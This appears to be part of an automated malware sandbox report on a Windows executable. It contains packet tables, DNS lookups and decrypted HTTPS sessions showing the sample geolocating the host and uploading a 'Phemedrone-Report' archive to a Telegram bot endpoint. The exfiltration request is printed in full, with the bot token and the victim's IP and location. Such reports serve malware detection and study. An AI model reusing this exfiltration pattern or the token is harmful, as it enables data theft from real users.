Mar 11, 2025 18:11:37.401436090 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.401463985 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.401556969 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.401647091 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.401662111 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.401782990 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.401818037 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.401819944 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.401834965 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.401906013 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.401916027 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.401969910 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.401990891 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402010918 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.402076006 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402101040 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402118921 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402144909 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.402177095 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402195930 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402272940 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402276039 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.402297020 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402319908 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402329922 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.402348995 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402371883 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402399063 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402467966 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402507067 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.402594090 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402676105 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.402709961 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.402806997 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.402868032 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.403028011 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.403120041 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.403155088 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.403188944 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.403403997 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.403515100 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.403640032 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.403954029 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.404114962 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.404185057 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.404551029 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.404670954 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.404721022 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.404751062 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.404757977 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.404759884 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.404798031 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.404864073 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.404907942 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.404930115 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.404930115 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.404961109 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.404990911 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.405081987 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.405143023 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.405189991 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:37.405203104 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.405638933 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.406441927 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.723110914 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:37.829070091 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:38.779917002 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:38.789138079 CET	443	49727	149.154.167.220	192.168.2.5
Mar 11, 2025 18:11:38.792680025 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:38.863928080 CET	49727	443	192.168.2.5	149.154.167.220
Mar 11, 2025 18:11:41.858920097 CET	49720	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:41.858957052 CET	443	49720	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:41.858963966 CET	49721	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:41.858989000 CET	49722	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:41.858997107 CET	443	49722	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:41.859000921 CET	443	49721	142.250.184.196	192.168.2.5
Mar 11, 2025 18:11:41.859033108 CET	49723	443	192.168.2.5	142.250.184.196
Mar 11, 2025 18:11:41.859070063 CET	443	49723	142.250.184.196	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 11, 2025 18:11:21.466192961 CET	53	57939	1.1.1.1	192.168.2.5
Mar 11, 2025 18:11:21.475130081 CET	53	63600	1.1.1.1	192.168.2.5
Mar 11, 2025 18:11:21.476201057 CET	60644	53	192.168.2.5	1.1.1.1
Mar 11, 2025 18:11:21.476351023 CET	62387	53	192.168.2.5	1.1.1.1
Mar 11, 2025 18:11:21.482868910 CET	53	60644	1.1.1.1	192.168.2.5
Mar 11, 2025 18:11:21.483475924 CET	53	62387	1.1.1.1	192.168.2.5
Mar 11, 2025 18:11:25.348334074 CET	49171	53	192.168.2.5	1.1.1.1
Mar 11, 2025 18:11:25.355150938 CET	53	49171	1.1.1.1	192.168.2.5
Mar 11, 2025 18:11:34.963706970 CET	63331	53	192.168.2.5	1.1.1.1
Mar 11, 2025 18:11:34.970725060 CET	53	63331	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 11, 2025 18:11:21.476201057 CET	192.168.2.5	1.1.1.1	0xc142	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 11, 2025 18:11:21.476351023 CET	192.168.2.5	1.1.1.1	0xe4e5	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 11, 2025 18:11:25.348334074 CET	192.168.2.5	1.1.1.1	0x5cd3	Standard query (0)	get.geojs.io	A (IP address)	IN (0x0001)	false
Mar 11, 2025 18:11:34.963706970 CET	192.168.2.5	1.1.1.1	0xa821	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 11, 2025 18:11:21.482868910 CET	1.1.1.1	192.168.2.5	0xc142	No error (0)	www.google.com	142.250.184.196	A (IP address)	IN (0x0001)	false
Mar 11, 2025 18:11:21.483475924 CET	1.1.1.1	192.168.2.5	0xe4e5	No error (0)	www.google.com		65	IN (0x0001)	false
Mar 11, 2025 18:11:25.355150938 CET	1.1.1.1	192.168.2.5	0x5cd3	No error (0)	get.geojs.io	104.26.1.100	A (IP address)	IN (0x0001)	false
Mar 11, 2025 18:11:25.355150938 CET	1.1.1.1	192.168.2.5	0x5cd3	No error (0)	get.geojs.io	104.26.0.100	A (IP address)	IN (0x0001)	false
Mar 11, 2025 18:11:25.355150938 CET	1.1.1.1	192.168.2.5	0x5cd3	No error (0)	get.geojs.io	172.67.70.233	A (IP address)	IN (0x0001)	false
Mar 11, 2025 18:11:34.970725060 CET	1.1.1.1	192.168.2.5	0xa821	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

get.geojs.io

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49725	104.26.1.100	443	7924	C:\Users\user\Desktop\R9rwNLVzpr.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 17:11:27 UTC	76	OUT	GET /v1/ip/geo.json HTTP/1.1 Host: get.geojs.io Connection: Keep-Alive
2025-03-11 17:11:28 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 17:11:28 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-request-id: 9abd79d5e35e70afce4f53babba8ccef-ASH strict-transport-security: max-age=15552000; includeSubDomains; preload access-control-allow-origin: * access-control-allow-methods: GET pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 geojs-backend: ash-01 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynUMWlfj%2FoORikL9VS7VkeagS%2FIAjbsoPn8mKM5SIUw42E6JBqil633ZNKmYmuuu%2F9TVL6iEY%2F2FWkP%2BQwlg61X4r%2FIkz9nGG0lBTnfxXsMDKcAd0JqYgNGWciCNyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 91ecabd12d86a52d-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=28796&min_rtt=26751&rtt_var=11072&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2813&recv_bytes=690&delivery_rate=81529&cwnd=244&unsent_bytes=0&cid=94c2b28438deea30&ts=1374&x=0"
2025-03-11 17:11:28 UTC	238	IN	Data Raw: 31 34 63 0d 0a 7b 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 33 36 33 20 42 48 4e 2d 33 33 33 36 33 22 2c 22 63 69 74 79 22 3a 22 4c 61 6b 65 6c 61 6e 64 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 42 48 4e 2d 33 33 33 36 33 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 61 73 6e 22 3a 33 33 33 36 33 2c 22 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 22 6c 61 74 69 74 75 64 65 22 Data Ascii: 14c{"organization":"AS33363 BHN-33363","city":"Lakeland","organization_name":"BHN-33363","area_code":"0","country":"United States","country_code":"US","country_code3":"USA","continent_code":"NA","asn":33363,"region":"Florida","latitude"
2025-03-11 17:11:28 UTC	101	IN	Data Raw: 3a 22 32 38 2e 30 37 30 32 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 31 2e 39 36 34 31 22 2c 22 61 63 63 75 72 61 63 79 22 3a 35 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 70 22 3a 22 33 35 2e 31 34 32 2e 35 31 2e 32 38 22 7d 0a 0d 0a Data Ascii: :"28.0702","longitude":"-81.9641","accuracy":5,"timezone":"America\/New_York","ip":"35.142.51.28"}
2025-03-11 17:11:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49727	149.154.167.220	443	7924	C:\Users\user\Desktop\R9rwNLVzpr.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 17:11:37 UTC	384	OUT	POST /bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600 Content-Type: multipart/form-data; boundary=----------------------------8dd609e3f740105 Host: api.telegram.org Content-Length: 747123 Expect: 100-continue Connection: Keep-Alive
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 30 39 65 33 66 37 34 30 31 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 33 35 2e 31 34 32 2e 35 31 2e 32 38 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 66 77 61 3c cb fe 89 58 7f 7f 6a ec d8 7c 2e 61 36 d5 62 66 9b 3e 06 4e 21 fa 12 3e e4 2e 3e 67 ed 2d 57 8b 07 53 b9 8f f9 7e 91 fd 8e 84 af db 35 89 61 30 1d 25 1a 24 cf 9b 85 0f 29 2c a2 39 12 Data Ascii: ------------------------------8dd609e3f740105Content-Disposition: form-data; name="document"; filename="[US]35.142.51.28-Phemedrone-Report.phem"Content-Type: application/octet-streamfwa<Xj\|.a6bf>N!>.>g-WS~5a0%$),9
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: fd 62 3b ea ef 2c 58 44 52 f0 c4 2a 85 46 e0 75 ee c3 9b ed 8c 72 fd 44 e5 74 14 a2 b3 98 c1 a5 ab 92 38 94 cc fd 7f b6 a3 ae 62 87 f9 ff 00 75 e8 e1 52 cb b9 ff dc fd 57 5b 32 14 00 c5 cf 21 b9 5d e8 f4 6e b8 c2 4d 93 02 29 5a 2c e8 4a e3 f3 6c 70 51 b5 07 c4 3f 8f 3a 54 56 4d 5b ff c3 a4 2b 15 5e 25 d7 53 35 16 b9 9b 89 1a 82 14 c7 a4 2e 70 47 fb 96 90 6a 36 7e 91 75 a5 4b 87 d1 07 26 df 1b 65 90 0a c0 da f1 b2 76 62 d9 87 51 66 85 a9 8d 1c bc cf db 59 8a fe 04 2c b4 2d 3b ea f8 e2 98 84 9e b7 b3 45 4d e4 70 07 ca 3e 3b 4e 6e 34 ee 91 66 05 91 05 1a fd cc 9c 3d 8d c3 c1 98 7d 27 38 75 fd 97 e2 ed 20 d7 8f 1f 1f a0 82 a5 c6 9e 58 c7 b5 51 77 80 2c 71 04 7e e0 21 ee 44 69 18 47 7d 13 79 cf 3f d5 10 de da fb f7 af e2 23 fd 37 e2 4a b6 1f 06 74 b4 bc 3f 25 Data Ascii: b;,XDR*FurDt8buRW[2!]nM)Z,JlpQ?:TVM[+^%S5.pGj6~uK&evbQfY,-;EMp>;Nn4f=}'8u XQw,q~!DiG}y?#7Jt?%
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: b8 19 65 2c 10 5d f9 fa 35 9a 53 55 ce 09 60 d0 c3 29 14 a2 dc ab d2 2f b0 3a 13 4e a1 9e a2 56 fe 79 ae cd 6b aa 1e 26 31 12 ae 7a 6c ed 65 98 2c 1a 6d f0 16 25 ca be 04 ca 2f 72 f5 fb 59 4f fc 1b b7 da 38 6f 06 de 2d b3 53 6b 0b e8 56 c3 12 6a 93 7f 61 25 a6 7b 29 5a dd 7b bc 82 3a b0 b6 9e 20 f9 83 eb b9 0d 21 e7 da d5 bf d0 6e ae 1e 3a 4b 8f 84 a8 6c af c1 28 ff 20 9d b1 c2 cb d7 fe 57 ab 91 c2 52 7b 61 67 0f 67 2a a2 28 ee 94 e1 d8 be 39 13 7f df 53 1b da df 6f bb 54 7d 5b c6 0e c0 9e e7 b2 95 7f 18 55 f8 e5 bb 36 c8 37 75 b9 dc 47 c2 c3 27 26 05 7e 48 4f ce a5 f0 de b3 85 d2 95 e1 73 ee d9 93 2e 89 6c 15 56 bc 7f 59 c2 77 0d 4d 74 f2 ae a2 ac c9 63 55 50 86 2c 8f 89 62 80 fc 1e bd fb c1 e9 80 41 30 10 d9 ec f8 65 08 99 1e b5 90 72 58 4a f7 24 b4 4b Data Ascii: e,]5SU`)/:NVyk&1zle,m%/rYO8o-SkVja%{)Z{: !n:Kl( WR{agg*(9SoT}[U67uG'&~HOs.lVYwMtcUP,bA0erXJ$K
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: e3 04 48 62 f8 28 75 65 42 ce 35 7c f6 c7 19 b7 10 77 fa 62 ec 0f a6 8b 97 d5 39 fa 6e 1f 0e 0f b9 c7 1a 3c 81 0b ef c1 ce e6 a5 66 6d e7 ca 36 5f 91 2d 74 ce 2a 30 be 8f f4 38 cd e2 5e 01 8e 73 38 23 c6 10 43 e2 a4 88 58 9d 2a bd 6f 2e 2e b6 9f 23 7d 5d 74 50 16 f6 89 72 fd 4e 80 c2 1b 3b 1b cb 55 a7 8d c3 fb 71 a9 1f ac 86 d4 f0 ba 59 37 d6 4d 3f e8 c2 24 7b af c2 8d fd ec c4 11 fb 3e d7 b3 1f bf 26 da 84 03 3d f0 e8 e8 07 59 15 bf bd d5 05 08 1d 12 ed 0b 3c bb fd c8 61 71 40 3a d0 72 da 9d e6 c6 21 ee 64 1c 72 3f 7b d6 b1 d0 94 90 00 9f 34 af d2 c6 1e db 98 a1 ce d5 36 ee f1 1e 80 06 0a 60 f7 61 07 65 1a 23 ec e1 f8 b9 40 02 e1 70 1b 5c 43 3a 48 ea 04 c9 bc 08 96 fe 1b 5f 00 1e 65 85 d0 c3 95 9f 61 2d 99 94 fe f9 53 15 26 97 8b 9e 44 01 70 94 c4 a8 b4 Data Ascii: Hb(ueB5\|wb9n<fm6_-t08^s8#CXo..#}]tPrN;UqY7M?${>&=Y<aq@:r!dr?{46`ae#@p\C:H_ea-S&Dp
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: 8e 9c 2f 2b 25 c7 92 b3 41 b0 bf fa 81 b1 da 28 cc 14 df f2 51 e9 8f e2 eb 4a 4c 1c de 7b 45 fb b7 b3 77 ab 79 d1 02 61 be 2c cf b9 ad 58 ba c3 51 8d 9e 00 0f b3 5d 08 51 f4 4b 0b dd 51 88 a7 f4 d1 21 a5 38 85 57 e1 24 66 65 1d c1 dc a8 c7 94 27 cc f3 0b 95 d2 ae 3a 5c f1 98 87 ce a2 80 71 c3 dc e2 56 42 3f 3e 5f 79 44 88 6c 61 b7 45 dd c2 47 e8 02 70 3f 24 5c 80 b6 a3 b6 0d 08 0e 5c db 8c c8 9f f0 54 ec 26 69 7a cb a7 0c e4 a9 d1 57 1e e5 69 95 da da 55 74 c7 a0 22 4c 24 76 bf 5d 78 99 0a 61 a3 a7 84 4f b5 2f 4b 25 16 79 33 b6 0e 7f 74 7a 90 f5 75 12 73 f9 fc 42 41 7a c7 4a 97 2d ba 84 5b 7f ee 97 cc 1f 58 fb 87 37 19 53 2a df 77 d1 cd 49 73 f1 ac 5c b9 1a dd 25 56 45 61 54 25 70 94 8d f0 11 3f b3 c7 c2 31 ac 0e 73 2e 35 6a 98 67 01 b5 43 5a 8c 3f 2a 24 Data Ascii: /+%A(QJL{Ewya,XQ]QKQ!8W$fe':\qVB?>_yDlaEGp?$\\T&izWiUt"L$v]xaO/K%y3tzusBAzJ-[X7SwIs\%VEaT%p?1s.5jgCZ?$
2025-03-11 17:11:37 UTC	145	OUT	Data Raw: 7b 99 b3 77 0e 51 e3 d4 31 2d 80 3c 3b be ff f0 07 7f 7a 3d 9c 0c a5 ea a5 5e bb d4 d2 b3 01 94 cc 14 09 93 3c fd e9 1a db 67 a5 6c 32 96 b1 a5 3c bf 25 2b e1 de 04 e8 f2 b2 db ef 64 39 64 d1 48 c7 13 f6 ae 2f 56 a5 14 cd ab 4a 9c 0e 02 01 fe 5f 9c b7 bd 70 de 46 76 c9 c9 16 f1 9e 39 35 88 85 0f 9e 8a 0a 32 0b 01 c2 f0 1d d8 ab 9c a2 8f 72 ea 99 7c 14 7a 78 e1 d9 6b 7c e3 99 06 96 97 dc a2 c6 a2 ab c5 d5 b5 1e be 3c e0 7f 06 ba 9c Data Ascii: {wQ1-<;z=^<gl2<%+d9dH/VJ_pFv952r\|zxk\|<
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: b0 a4 42 16 85 b3 c8 31 f2 81 96 92 5c c2 8a af bd a5 8e 7e 87 09 f5 d5 70 e6 f5 57 a6 45 4b 89 62 58 7b 3f 14 a7 c8 46 2c b9 a6 ff 49 9a fe a9 a3 f1 32 f1 45 b1 bc f9 22 81 36 11 7d 60 f5 b9 bf 6c 00 24 14 d4 97 f7 c8 bb 68 4a 35 40 19 4c 26 f0 a5 cc 9a a7 7e 60 18 85 5b 0e 98 f3 67 e3 b6 48 d4 fd 49 ef c0 3a 06 86 76 f5 46 18 62 11 1c 51 7b f8 80 bc 53 bc a1 8b 78 33 ca 42 9b b9 1e 76 04 01 8f a2 1e c6 cd d1 5c 6b 44 e4 f1 40 f5 10 1a 05 c2 5b 05 02 80 2d 39 75 24 ef d1 88 c9 cb 47 0d 0e 0f 3c d7 99 b8 d0 e9 ec b9 5e 6c 88 48 63 df 56 d8 88 21 22 52 c5 71 b3 64 b7 da 9c 60 f7 f6 a2 e8 34 73 d4 45 f8 bb 47 2b 14 61 ec 68 a9 74 2f f1 bd 22 ad f5 dc a5 be 5f 25 e3 15 05 eb 8a 58 cc f6 38 9e 90 29 89 32 24 ff a2 f5 40 2c 27 d0 1a 3c 43 e8 4c 8d e9 c6 8c 87 Data Ascii: B1\~pWEKbX{?F,I2E"6}`l$hJ5@L&~`[gHI:vFbQ{Sx3Bv\kD@[-9u$G<^lHcV!"Rqd`4sEG+aht/"_%X8)2$@,'<CL
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: a2 8e 98 03 6b 02 c2 da b6 d4 86 73 f4 61 45 09 02 96 81 61 a8 21 69 70 bc ed c1 19 3d 90 5c a8 92 df 25 d1 85 13 0e 6f e6 c4 46 ba 0a a9 07 36 41 4d f5 be b0 13 e6 32 50 5d bd 6a 9d 7f 99 20 43 25 41 57 b8 04 3d 57 39 31 f0 f9 32 6d ff 5d ce 26 1f 60 df a5 8e 1a cd 9d 97 40 a9 cd 0f e1 5b f2 38 28 7e 7d ea 08 d6 d7 af ee 24 03 5d 3d 07 9b 5a 53 21 d6 60 ee fa 9d 6d da 0d 56 74 f9 92 e7 d0 92 5c 30 08 c8 cc 34 88 59 63 34 81 5b e2 12 3f 0b 47 b7 46 23 47 b3 f7 50 89 6e 44 cc 85 b2 7c 2b df 65 35 33 8a 16 26 5b e0 8b cd 8f f8 c9 11 36 68 f6 f1 84 97 55 34 f0 21 cc c6 5f 47 fc eb 1d 6f b5 a4 ca 29 d9 c8 52 d7 2c 0a c8 92 dc 26 dc 0b 76 de a5 88 14 9f 82 8b fd 89 5e 21 2e f0 ad 53 85 8e cd 5a d0 13 76 99 bb cf 43 6d 8d 5b 1d 41 91 7b 77 57 14 31 9d 63 1b 9f Data Ascii: ksaEa!ip=\%oF6AM2P]j C%AW=W912m]&`@[8(~}$]=ZS!`mVt\04Yc4[?GF#GPnD\|+e53&[6hU4!_Go)R,&v^!.SZvCm[A{wW1c
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: cf f3 be d7 ba c2 29 4a b2 4b 19 1f 6d 28 81 d1 9a 8f 5f 93 f2 2e 2a ef 65 81 36 61 bf 45 1b 22 f8 dc bc c7 77 cf 22 ee af 4d 57 91 27 14 73 80 a8 0e fd f7 ff cc 16 13 ef 73 3c 59 4f ad c2 f5 9a e5 12 4e 83 96 70 88 fc 4d 66 03 31 5d 20 b7 e0 8b 33 c5 1b dc 9c bc 5e a0 2a 92 f0 f6 97 2d 87 fa 21 be 46 74 d6 65 b8 51 a1 11 23 64 8f 56 90 a0 7f 3e e3 17 6e 6e a6 03 45 8b fc 77 6f 72 e3 23 86 10 6b c2 79 a2 34 f1 77 c9 e7 d7 80 f6 e6 e2 cc 0d e1 c5 a1 8a 7c 36 ef 0c c0 dc 49 74 6b 65 6b 82 e1 67 b6 9f 38 12 29 df 53 9c 3e 02 d9 bf 5c 3c 90 1f e2 bc 12 e8 53 2d 62 e6 ff 16 b9 30 ae 7d 38 2c 7d eb f1 7e a3 a3 a1 2e 7d 43 51 00 1b 15 ae e4 fd 14 08 e7 99 13 2c 4a 17 85 7c 71 a4 cc eb 8c 86 2c 6c b0 78 43 71 ed 11 f6 04 f0 85 4b ea 9e 68 a9 af 67 c6 e8 c2 37 9a Data Ascii: )JKm(_.e6aE"w"MW'ss<YONpMf1] 3^-!FteQ#dV>nnEwor#ky4w\|6Itkekg8)S>\<S-b0}8,}~.}CQ,J\|q,lxCqKhg7
2025-03-11 17:11:37 UTC	16355	OUT	Data Raw: bd b1 06 04 f9 ce 08 0b d4 b9 f4 3c f1 32 e3 3a 1e 3e 4b e0 fd 76 f4 b0 14 46 9a fc de b9 3b 2e e6 59 7e fa 44 a9 33 de 31 d7 9c e4 69 7d b0 f1 25 00 1b 8e 64 ba 15 f9 f9 57 46 5a f5 72 a8 87 3e ad 6f d4 e1 5b 3c bb ee b8 85 75 1a 80 5a cf 90 49 2b 97 2a 32 2e 43 6f f9 8d 41 6b 20 e7 26 93 70 84 0f 83 d0 95 45 31 9f 64 25 75 53 4c 17 ab eb c8 8c bf 61 ea 94 24 e6 b4 7b a0 2c 7a 02 94 26 67 f1 6c 76 a7 6f 11 0e 44 7f 64 3e 48 f0 0e 41 17 cf 78 85 94 41 45 71 40 d9 d7 36 fc d4 fb 1d 42 33 d0 7f 84 0e b7 96 26 56 ef 00 5a bd 0a b1 28 c1 17 15 23 89 d5 50 88 33 b7 24 8b 0d a5 60 77 10 74 95 22 a3 c5 91 72 80 ac 95 c9 b1 43 31 25 23 9a 0a 60 a8 01 99 d1 72 78 06 12 e3 98 b2 78 ae 61 b9 6a fb e2 0b 60 ba 8d 64 ab ad 35 47 4a df 14 61 8c e4 6d b7 2b dd e5 5d 7c Data Ascii: <2:>KvF;.Y~D31i}%dWFZr>o[<uZI+*2.CoAk &pE1d%uSLa${,z&glvoDd>HAxAEq@6B3&VZ(#P3$`wt"rC1%#`rxxaj`d5GJam+]\|
2025-03-11 17:11:37 UTC	25	IN	HTTP/1.1 100 Continue
2025-03-11 17:11:38 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Tue, 11 Mar 2025 17:11:38 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID:	1
Start time:	13:11:15
Start date:	11/03/2025
Path:	C:\Users\user\Desktop\R9rwNLVzpr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\R9rwNLVzpr.exe"
Imagebase:	0xff0000
File size:	653'312 bytes
MD5 hash:	16E8183843E73D742EE2F2D334B8C6C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
